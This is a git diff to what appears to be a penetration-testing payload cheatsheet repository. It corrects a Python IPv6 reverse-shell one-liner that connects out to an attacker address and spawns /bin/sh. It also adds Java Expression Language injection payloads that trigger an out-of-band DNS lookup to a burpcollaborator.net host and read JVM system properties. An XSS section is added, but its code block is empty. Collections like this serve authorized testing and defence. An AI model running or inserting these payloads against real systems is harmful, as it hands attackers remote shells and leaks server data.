diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 4dc4f2a..3b047c1 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -150,7 +150,7 @@ python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty") IPv6 (No Spaces, Shortened) ```python -python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),,2);p("/bin/sh")' +python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' ``` Windows only diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 37772b7..b4374da 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -149,6 +149,16 @@ ${1+1} #{1+1} ``` +### Expression Language EL - One-Liner injections not including code execution + +```java +// DNS Lookup +${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")} + +// JVM System Property Lookup (ex: java.class.path) +${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")} +``` + ### Expression Language EL - Code Execution diff --git a/XSS Injection/README.md b/XSS Injection/README.md index cb4840c..187a80f 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -260,6 +260,12 @@ e.g: 14.rs/#alert(document.domain) Use CTRL+SHIFT+X to trigger the onclick event ``` +### XSS when payload is reflected capitalized + +```javascript + +``` + ### DOM based XSS Based on a DOM XSS sink.